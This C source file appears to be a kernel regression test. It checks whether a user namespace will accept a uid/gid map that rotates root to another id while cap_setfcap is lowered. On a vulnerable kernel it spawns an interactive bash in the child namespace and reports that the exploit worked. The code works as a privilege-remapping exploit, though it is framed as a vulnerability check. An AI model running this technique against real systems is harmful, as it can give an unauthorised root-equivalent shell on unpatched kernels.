/*
* Try unsharing where we remap the root user by rotating uids (0,1,2)
* and the corresponding gids too.
*/
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/capability.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <unistd.h>
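/* Size of the anonymous mapping used as the clone() child's stack.
 * Parenthesised so the macro stays a single operand in expressions
 * such as stack+STACK_RESERVED. */
#define STACK_RESERVED (10*1024)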
/*
 * Pair of pipes shared between the parent and the CLONE_NEWUSER child.
 * "to" carries the parent's one-byte verdict to the child (parent writes
 * to[1], child reads to[0]); "from" carries the child's one-byte ready
 * acknowledgement back (child writes from[1], parent reads from[0]).
 */
struct my_pipe {
int to[2];
int from[2];
};
/*
 * Body of the CLONE_NEWUSER child started by clone() in main().
 *
 * data points at the struct my_pipe shared with the parent. The child
 * keeps only the read end of "to" and the write end of "from": it sends
 * a single '1' byte to acknowledge it is running, then blocks until the
 * parent answers with one byte. '!' means the parent gave up (exit 0);
 * anything else means the maps were written and the child replaces
 * itself with an interactive bash. Returns only if the exec fails, in
 * which case the process exits with status 1.
 */
static int child(void *data) {
	struct my_pipe *pipes = data;
	static const char * const shell_argv[] = {"bash", NULL};
	int wakeup = pipes->to[0];
	int ack = pipes->from[1];

	/* Drop the pipe ends that belong to the parent. */
	close(pipes->to[1]);
	close(pipes->from[0]);

	/* Tell the parent we are up, then we are done with that channel. */
	if (write(ack, "1", 1) != 1) {
		fprintf(stderr, "failed to confirm setuid(1)\n");
		exit(1);
	}
	close(ack);

	/* Block until the parent has either written the maps or bailed. */
	char verdict;
	if (read(wakeup, &verdict, 1) != 1) {
		fprintf(stderr, "failed to wait for parent\n");
		exit(1);
	}
	close(wakeup);

	if (verdict == '!') {
		/* Parent could not complete the setup; nothing to run. */
		exit(0);
	}

	setsid();
	/* argv is const-qualified; go via void * to satisfy execv's prototype. */
	execv("/bin/bash", (const void *) shell_argv);
	perror("execv failed");
	exit(1);
}
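/*
 * Drive the test.
 *
 * Requires cap_sys_admin in the effective set (otherwise the test is
 * reported as not testable and exits 0). With cap_setfcap lowered, a
 * CLONE_NEWUSER child is created while running as uid 1; the parent then
 * switches back to uid 0 and tries to write a rotating uid/gid map
 * (0->1, 1->2, 2->0) into the child's /proc/<pid>/{uid,gid}_map. A
 * kernel that accepts the map lets the child exec an interactive shell,
 * which the test reports as the exploit working; a kernel that rejects
 * the map makes the test print "exploit attempt failed".
 *
 * Exit status: 0 when the environment cannot run the test or the
 * exploit fails; 1 on any setup error or when the exploit works.
 */
int main(int argc, char **argv)
{
	(void) argc;
	(void) argv;

	/* Fixed table, never user-controlled, so the non-literal format is safe. */
	static const char *file_formats[] = {
		"/proc/%d/uid_map",
		"/proc/%d/gid_map"
	};
	/* Rotate ids 0,1,2 and leave the remainder identity-mapped. */
	static const char id_map[] = "0 1 1\n1 2 1\n2 0 1\n3 3 49999997\n";
	cap_value_t fscap = CAP_SETFCAP;
	cap_flag_value_t present;

	cap_t orig = cap_get_proc();
	if (orig == NULL) {
		perror("failed to read process capabilities");
		exit(1);
	}
	if (cap_get_flag(orig, CAP_SYS_ADMIN, CAP_EFFECTIVE, &present) != 0) {
		perror("failed to read a capability flag");
		exit(1);
	}
	if (present != CAP_SET) {
		fprintf(stderr,
			"environment missing cap_sys_admin - exploit not testable\n");
		exit(0);
	}

	/* Run with this one lowered */
	if (cap_set_flag(orig, CAP_EFFECTIVE, 1, &fscap, CAP_CLEAR) != 0) {
		perror("failed to lower cap_setfcap");
		exit(1);
	}

	struct my_pipe fds;
	if (pipe(&fds.from[0]) || pipe(&fds.to[0])) {
		perror("no pipes");
		exit(1);
	}

	/* Private stack for the clone()d child; the stack grows down, so
	 * the child is handed the top of the mapping. */
	char *stack = mmap(NULL, STACK_RESERVED, PROT_READ|PROT_WRITE,
			   MAP_ANONYMOUS|MAP_PRIVATE|MAP_STACK, -1, 0);
	if (stack == MAP_FAILED) {
		perror("no map for stack");
		exit(1);
	}

	/* Become uid 1 for the clone, keeping the (lowered) capability set. */
	if (cap_setuid(1)) {
		perror("failed to cap_setuid(1)");
		exit(1);
	}
	if (cap_set_proc(orig)) {
		perror("failed to raise caps again");
		exit(1);
	}

	pid_t pid = clone(&child, stack+STACK_RESERVED, CLONE_NEWUSER|SIGCHLD, &fds);
	if (pid == -1) {
		perror("clone failed");
		exit(1);
	}

	/* Keep only the parent's ends of the two pipes. */
	close(fds.from[1]);
	close(fds.to[0]);

	/* Back to uid 0 before touching the child's map files. */
	if (cap_setuid(0)) {
		perror("failed to cap_setuid(0)");
		exit(1);
	}
	if (cap_set_proc(orig)) {
		perror("failed to raise caps again");
		exit(1);
	}

	/* Wait for the child's one-byte ready acknowledgement. */
	char datum[1];
	if (read(fds.from[0], datum, 1) != 1 || datum[0] != '1') {
		fprintf(stderr, "failed to read child status\n");
		exit(1);
	}
	close(fds.from[0]);

	for (size_t i = 0; i < sizeof file_formats / sizeof file_formats[0]; i++) {
		char *map_file;
		if (asprintf(&map_file, file_formats[i], pid) < 0) {
			perror("allocate string");
			exit(1);
		}
		FILE *f = fopen(map_file, "w");
		free(map_file);
		if (f == NULL) {
			perror("fopen failed");
			exit(1);
		}
		size_t want = strlen(id_map);
		if (fwrite(id_map, 1, want, f) != want) {
			fclose(f);
			goto bailok;
		}
		/* fclose flushes the buffered map, so a kernel rejection of
		 * the mapping may only become visible here. */
		if (fclose(f)) {
			goto bailok;
		}
	}

	/* Both maps accepted: release the child. */
	if (write(fds.to[1], ".", 1) != 1) {
		perror("failed to write '.'");
		exit(1);
	}
	close(fds.to[1]);
	fprintf(stderr, "user namespace launched exploit worked - upgrade kernel\n");
	if (wait(NULL) == pid) {
		exit(1);
	}
	perror("launch failed");
	exit(1);

bailok:
	/* Map write rejected: tell the child to exit quietly. */
	fprintf(stderr, "exploit attempt failed\n");
	if (write(fds.to[1], "!", 1) != 1) {
		perror("failed to inform child [ignored]");
	}
	exit(0);
}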